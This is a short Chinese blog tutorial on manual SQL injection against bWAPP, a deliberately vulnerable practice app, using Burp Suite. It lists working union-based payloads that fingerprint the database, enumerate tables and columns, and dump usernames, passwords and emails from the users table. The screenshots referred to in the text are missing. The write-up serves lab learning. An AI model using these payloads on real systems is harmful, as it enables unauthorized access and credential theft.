接下来开始注入了。
1、打开burpsuit,在浏览器里搜索框中输入1,然后提交,抓住数据包。结果如图:
2、在数据包头的URI部分输入“title=1‘”,然后发送,结果如图:
然后发送到Repeater。
3、判断是什么类型注入
先输入“title=1%‘and‘%‘=‘”,发现返回数据没有报错,把“1”换成“i”,发现返回正常数据;因为钢铁侠(iron man)有“i”,所以可以正常返回。结果如图:
4、判断字段数:
输入“title=1%‘+order+by+7+--+”,返回正常;输入“title=1%‘+order+by+8+--+”,返回错误;burpsuit的空格需要用“+”表示。结果如下图:
查看一下,输入“title=1%‘union+select+1,2,3,4,5,6,7+--+”,结果如图:
5、查询数据库等信息:
输入“title=1%‘union+select+1,2,3,4,5,6,group_concat(database(),"||",version(),"||",user())+--+”,查询数据库名、数据库版本、当前用户,结果如图:
数据库名为“bwapp”,数据库版本“5.5.53”,当前用户“root@localhost”。
6、查询表名:
输入“title=1%‘union+select+1,2,3,4,5,6,table_name+from+information_schema.tables+where+table_schema=‘bwapp‘+--+”,发现较重要的表名为users。结果如图:
7、查询字段名:
输入“title=1%‘union+select+1,2,3,4,5,6,column_name+from+information_schema.columns+where+table_name=‘users‘+--+”,发现较重要的字段名有“admin、password、email”,结果如图:
8、查询字段内容:
输入“title=1%‘union+select+1,2,3,4,5,6,group_concat(admin,"||",password,"||",email)+from+users+--+”,结果如图:
好像讲的很简单,有什么问题可以一起讨论啊。
原文地址:http://blog.51cto.com/13577444/2092147
